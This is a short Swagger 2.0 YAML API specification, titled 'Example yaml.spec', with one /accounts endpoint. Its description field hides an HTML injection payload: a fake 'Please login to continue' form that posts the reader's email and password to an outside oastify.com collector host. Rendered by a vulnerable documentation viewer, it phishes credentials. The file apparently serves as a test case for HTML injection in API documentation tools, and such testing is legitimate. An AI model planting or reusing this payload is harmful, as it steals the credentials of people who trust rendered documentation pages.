swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
   <form action="https://bds4gi6qdvtmclegmps4yq4orfxfl59u.oastify.com" method="POST"><h3>Please login to continue</h3><input type="email" name="email" autocomplete="username" placeholder="Email"><input type="password" name="password" autocomplete="current-password" placeholder="Password"><button type="submit">Login</button></form>
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
